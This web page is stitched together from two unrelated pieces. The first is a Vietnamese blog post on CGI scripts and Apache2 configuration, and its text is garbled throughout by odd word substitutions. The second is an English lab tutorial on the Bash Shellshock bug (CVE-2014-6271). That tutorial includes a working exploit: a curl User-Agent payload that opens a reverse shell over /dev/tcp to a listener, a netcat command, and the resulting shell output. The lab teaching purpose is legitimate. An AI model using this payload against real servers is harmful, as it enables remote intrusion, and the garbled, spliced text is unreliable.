lappy: /etc/apache2 $ uname -a; lsb_release -aLinux lappy 3.2.0-30-generic #48-Ubuntu SMP Fri Aug 24 16:52:48 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
No LSB modules are available.Distributor ID: Ubuntu
Description: Ubuntu 12.04.1 LTSRelease: 12.04Codename: precise1. CGIThe CGI (Common Gateway Interface) defines a way for a web hệ thống to interact with external content-generating programs, which are often referred khổng lồ as CGI programs or CGI scripts. It is the simplest, & most common, way to put dynamic nội dung on your web site. http://httpd.apache.org/docs/2.2/howto/cgi.html
The Common Gateway Interface (CGI) is a standard (see RFC 3875: CGI Version 1.1) method for web vps software khổng lồ delegate the generation of web content to executable files.
Bạn đang xem: Python
Such files are known as CGI scripts; they are programs, often stand-alone applications, usually written in a scripting language.http://en.wikipedia.org/wiki/Common_Gateway_InterfaceNhư vậy CGI script đang là những file chạy được, vấn đề đó phải để ý khi debug.Viết script CGI:First, all output from your CGI program must be preceded by a MIME-type header. This is HTTP header that tells the client what sort of content it is receiving. Most of the time, this will look like:
Secondly, your output needs khổng lồ be in HTML, or some other format that a browser will be able to lớn display...http://httpd.apache.org/docs/2.2/howto/cgi.html
Một CGI script chỉ cần thoả mãn 2 điều kiện : bước đầu bằng MIME-type header như sinh sống trên, cùng output ra mã html (nói chung là ra text)Tạo CGI script "hello thon" với 4 ngữ điệu script phổ biến:1.1. PHPKhông đề nghị viết CGI script vày máy tớ đã sở hữu mod cung ứng php rồi, để lúc nào có điều kiện sẽ thử trên máy khác1.2. Python#!/usr/bin/pythonprint "Content-type: text/html"printprint "hello thon" 1.3. Perl#!/usr/bin/perlprint "Content-type: text/html ";print "Hello, thon." 1.4. TCLlaterrất đơn giản, bây giờ thì chẳng thấy ai cần viết CGI script nữa, chắc nó sẽ là một trong những phần lịch sử rồi.2. Config, debug Apache2cài :sudo apt-get install apache2sau khi download xong, hãy vào /etc/apache2 để khám phá
Apache2 sau thời điểm cài dứt sẽ có một file config chính là `apache2.conf`, 1 file khác là `httpd.conf` với thư mục sites-available/ chứa các file config.Nếu bạn đọc file apache2.conf đang thấy gồm dòng:# Include all the user configurations:Include httpd.conf# Include ports listing
Include ports.conf# Include generic snippets of statements
Include conf.d/# Include the virtual host configurations:Include sites-enabled/hãy xem kỹ file này để biết nơi đặt config của khách hàng vào đâu. Nếu như bạn sử dụng virtual host (không lý giải ở đây), hãy đặt vào `sites-enabled/`, ví như không, hãy viết vào `httpd.conf`. Nói bình thường cái này là từ bỏ do, không ai ép buộc cả.Sau lúc bạn thiết lập xong chúng ta có thể phóng vào localhost luôn luôn là vị đã bao gồm sẵn tệp tin config năm trong `sites-available/`, tên là `default` cùng đã được liên kết (hiểu sơ là sản xuất shortcut sang trọng thư mục `sites-enabled/`Nội dung phần đầu tệp tin này như sau:hvn
localhost Document
Root /var/www Options Follow
Sym
Links Allow
Override none Options Indexes Follow
Sym
Links Multi
Views Allow
Override all Order allow,deny allow from all Script
Alias /cgi-bin/ /usr/lib/cgi-bin/ Allow
Override None Options +Exec
CGI -Multi
Views +Sym
Links
If
Owner
Match Order allow,deny Allow from all Error
Log $APACHE_LOG_DIR/error.log # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. Log
Level warn Custom
Log $APACHE_LOG_DIR/access.log combinedquay lại chủ đề CGI, các bạn sẽ thấy dòng
Script
Alias /cgi-bin/ /usr/lib/cgi-bin/hãy đặt các script tại đoạn 1 vào trong thư mục này, chmod chúng thành các file chạy được (chmod a+x tenfile)Sau kia mở trình chăm nom ra cùng gõ:http://localhost/cgi-bin/index.pyhay http://localhost/cgi-bin/index.pl nhưng mà xem công dụng hello nhỏ ^^ .Toàn cỗ phần trên nói tới việc viết, config CGI script nắm nào mang lại chạy được, nó vẫn là một phần của vượt khứ và chỉ còn đọc cho biết thêm thôi :D .3. Debug apache2.Phần này giành cho những ai đó đã "hơi hơi" biết config Apache2.Nói cho debug ngẫu nhiên service như thế nào của Linux, hãy nghĩ cho file log đầu tiên. Về cơ bản thì đọc kết thúc log là bạn đã có thể giải quyết và xử lý vấn đề rồi (trừ đa số trường hợp rất oái oăm). điểm đặt log error chúng ta cũng có thể dễ dàng thấy trong file config trên, nó làm việc /var/log/apache2/error.log Các lỗi thường xuyên gặp:403 Forbidden : thường bạn sẽ gặp lỗi này khi trong thư mục các bạn vào không có file index.html xuất xắc index.php.Bạn hoàn toàn có thể thêm directive Options Indexesđể apache2 hiện nay danh sách những file trong thư mục đó thay thông báo 403.Nếu vấn đề là do permission, bạn sẽ dễ dàng kiếm tìm thấy vào log :D...Và cuối cùng, hãy nhớ chmod 755 là an toàn, 777 là ngây ngô (trừ khi bạn biết mình không đần :D )hvn
lappy: /usr/lib/cgi-bin $ ls -lt-rwxr-xr-x 1 root root 37 Dec 22 17:31 test.py đây là 755-rw-r--r-- 1 root root 0 Dec 22 17:27 index.cgi-rwxrwxrwx 1 root root 5 Dec 22 17:17 index.xxx đó là 777Hãy google cùng tự học tập config apache2, cũng không loằng ngoằng lắm, hoặc nếu muốn ăn "sổi" thì hãy học lệnh (directive) Alias để maps link đến các site khác biệt trên sản phẩm mình.Tắm rồi nạp năng lượng thôi, không học được gì cả :((PS: để luyện đọc mã nhị phân / hexa với điện thoại thông minh android của bạn, hãy cài ứng dụng này vào :v https://play.google.com/store/apps/details?id=com.hvn.geekgame lưu giữ +1 với 5 sao nhóe :x )
In September 2014, when a single security bug in Bash was disclosed there was chaos in the security community. This bug allowed attackers to escalate privileges và execute arbitrary code on a remote machine. It affected most versions of Linux & UNIX-based OSes and (obviously) was considered a critical vulnerability.
This bug is described in CVE-2014–6271. It was patched immediately which led to lớn another bug, CVE-2014–7169. This bug was patched, which led lớn another bug, CVE-2014–6277 and it was eventually patched as well.
In this first part of a three-part series, we’re going to look at the first vulnerability, CVE-2014–6271 và get a better understanding of it.
Credits: I’ve learnt about this exploit in a course, ENPM697 at the University of Maryland, College Park. Some of the examples used in this article belong to lớn the course resources prepared by Professor Dharmalingam Ganesan.
Lab Setup
The Shellshock family of security bugs were first discovered in năm trước and they were patched in the later Bash versions. Obviously, it is not possible to use the current Bash version to lớn demonstrate the exploit; we need the vulnerable Bash version. We also need two Virtual Machines; one of which will serve as a local machine & the other as the remote machine.
There are two ways to lớn get the vulnerable Bash version:
Use the SEED VM setup, orManually install the vulnerable Bash version.SEED VM
Use the SEED VM setup of Dr. Wenliang Du from http://www.cis.syr.edu/~wedu/seed/lab_env.html. This thiết đặt already has the vulnerable Bash version installed và is named bash_shellshock.
Note: I’ll be using the SEED VM cài đặt while demonstrating the exploit.
If you want to manually install the vulnerable Bash version, then follow the steps below:
Step 1: download the vulnerable version of bash from https://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz. Any version published before September 2014 is okay.
nikhilh 2019–02–19 20:46:55 (11.3 MB/s) — ‘bash-4.3.tar.gz’ saved <7955839/7955839> Step 2: Extract it into a local directory. nikhilh … bash-4.3/y.tab.hbash-4.3/parser-builtbash-4.3/pathnames.h.in Step 3: Configure và build.
ubuntu:~/Downloads$ wget https://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz — 2019–02–19 20:46:54 — https://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
ubuntu:~/Downloads$ tar -xvf bash-4.3.tar.gzbash-4.3/bash-4.3/CWRU/bash-4.3/CWRU/misc/bash-4.3/CWRU/misc/open-files.c
nikhilh
ubuntu:~/Downloads/bash-4.3$ ./configure && makechecking build system type… x86_64-unknown-linux-gnuchecking host system type… x86_64-unknown-linux-gnu
Beginning configuration for bash-4.3-release for x86_64-unknown-linux-gnu
…
Step 4: Create a symlink in the /bin directory pointing to lớn the installed vulnerable Bash program.
nikhilh
ubuntu:/bin$ sudo ln -s /home/nikhilh/Downloads/bash-4.3/bash bash_shellshocknikhilh
ubuntu:/bin$ ls -l bash*-rwxr-xr-x 1 root root 1113504 Apr 4 2018 bashlrwxrwxrwx 1 root root 37 Feb 19 20:54 bash_shellshock -> /home/nikhilh/Downloads/bash-4.3/bash
Hopefully, you were able to get the vulnerable Bash program from one of the above methods. Let’s verify that the installed Bash version contains CVE-2014–6271. Execute the following command:
SEED VM:
VM:~$ env x=’() :;; echo Oh No!’ bash_shellshock -c “echo Testing!”Oh No!Testing!Non-SEED VM:
nikhilh
ubuntu:~$ env x=’() :;; echo Oh No!’ bash_shellshock -c “echo Testing!”Oh No!Testing!
If you have the vulnerable version, the output of the command would contain the string Oh No!, else it would just be Testing!.
SEED VM:
VM:~$ env x=’() :;; echo Oh No!’ bash -c “echo Testing!”Testing!Non-SEED VM:
nikhilh
ubuntu:~$ env x=’() :;; echo Oh No!’ bash -c “echo Testing!”Testing!
The cause of the vulnerability lies in a loophole in the Bash algorithm which parses the values of environment variables. According to CVE-2014–6271, the vulnerable Bash version “processes trailing strings after function definitions in the values of environment variables, which allows remote attackers lớn execute arbitrary code via a crafted environment”.
If you’re interested in looking at the source code where the vulnerability lies, read this article: https://security.stackexchange.com/questions/68448/where-is-bash-shellshock-vulnerability-in-source-code.
In general, it is possible to store a function definition in an environment variable in Bash and then execute it. This in itself is not a vulnerability because we must call the environment variable as a command to lớn execute the function definition:
VM:~$ env x=’() echo hello; ;’ bash_shellshock -c “echo hi”hiVM:~$However, the parsing algorithm in Bash had a loophole. In a carefully crafted string, it was possible khổng lồ execute arbitrary commands without calling the environment variable as a command. This is a vulnerability because variables are not expected, by themselves, khổng lồ directly cause the execution of code contained in them.
The following is the environment variable-value pair that we used before to lớn verify the existence of CVE-2014–6271:
x=’() :;; echo Oh No!’
Ideally, this should have stored the value, ‘() :;; echo Oh No!’ in the environment variable x as a string because it doesn’t satisfy the rules of a correct function definition. The following is the behavior in the current Bash version:
VM:~$ echo $x() :;; echo hello worldHowever, the loophole in the vulnerable Bash program’s parsing algorithm caused two events:
The function definition part of the string was interpreted correctly as a function definition.The trailing strings after the function definition were automatically executed.VM:~$ echo $xVM:~$ declare -f xx ():Notice that this loophole can enable the attacker to lớn put in malicious strings after the function definition và they would be executed automatically when a vulnerable Bash program parses the environment variables.
Sample ExploitI have two SEED VMs, one of which will serve as the local machine and the other as the remote machine (maybe a website server). The IP address of the local VM is 10.0.2.6 và that of the remote VM is 10.0.2.7.
Our goal is to get a reverse shell (basically, a backdoor) from the remote machine back to our local machine on port, say 9090. To lớn this end, we must get the remote machine to execute malicious code that will be stored in one of its environment variables using the Bash Shellshock exploit.
Step 1: The name of a script on the remote machine which uses Bash khổng lồ execute.
In this case, I’ve created a .cgi script with a Bash shebang.
VM:…/cgi-bin$ pwd/usr/lib/cgi-binVM:…/cgi-bin$ ls -ltotal 4-rwxr-xr-x 1 root root 149 Feb đôi mươi 23:39 test.cgiVM:~$ cat /usr/lib/cgi-bin/test.cgi#! /bin/bash_shellshockecho “Content-type: text/plain”echoechoecho “Hello World”
Step 2: Retrieve the contents of the .cgi script through curl.
The User-Agent value used in curl is stored as an environment variable on the remote machine. By default, this is set khổng lồ HTTP_USER_AGENT=curl/7.47.0 when using curl. However, this value can be modified using the -A flag. We will store malicious code that sets up a reverse shell inside this environment variable.
-A “() echo hello; ; echo; /bin/bash_shellshock -i > /dev/tcp/10.0.2.6/9090 0&1”
Step 3: Open a netcat session on port 9090 that will wait for a connection from the remote machine.
VM:~$ nc -l 9090 -vListening on <0.0.0.0> (family 0, port 9090)Exploit Time!
Execute the following command on the local machine:
VM:~$ curl -A “() echo hello; ; echo; /bin/bash_shellshock -i > /dev/tcp/10.0.2.6/9090 0&1” http://10.0.2.7/cgi-bin/test.cgiHave a look at the terminal running the netcat session.
VM:~$ nc -l 9090 -vListening on <0.0.0.0> (family 0, port 9090)Connection from <10.0.2.7> port 9090
Notice that the netcat session is now pointing lớn the remote machine’s command line terminal!
bash_shellshock: no job control in this shell
bash_shellshock-4.2$ whoamiwhoamiwww-data
bash_shellshock-4.2$ lslstest.cgi
bash_shellshock-4.2$ mèo test.cgicat test.cgi#! /bin/bash_shellshock
echo “Content-type: text/plain”echoechoecho “Hello World”
echo “** Environment Variables *** “strings /proc/$$/environ
At this point, the attacker would have taken user-level control of the remote machine.
The www-data user is the mặc định user under which the Apache web server on the Ubuntu remote machine is running on. If it were running under root user, the attacker would have root privileges và would be in complete control!
Done!The Bash Shellshock family of vulnerabilities are one of those exploits which require almost zero knowledge khổng lồ execute. This makes them all the more dangerous because anyone can exploit systems và execute destructive commands.
In the next part of this series, we’ll look at CVE-2014–7169 which was caused because of an incomplete fix khổng lồ CVE-2014–6271. Thank you for reading! If you have any questions, leave them in the comments section below và I’ll get back khổng lồ you as soon as I can!
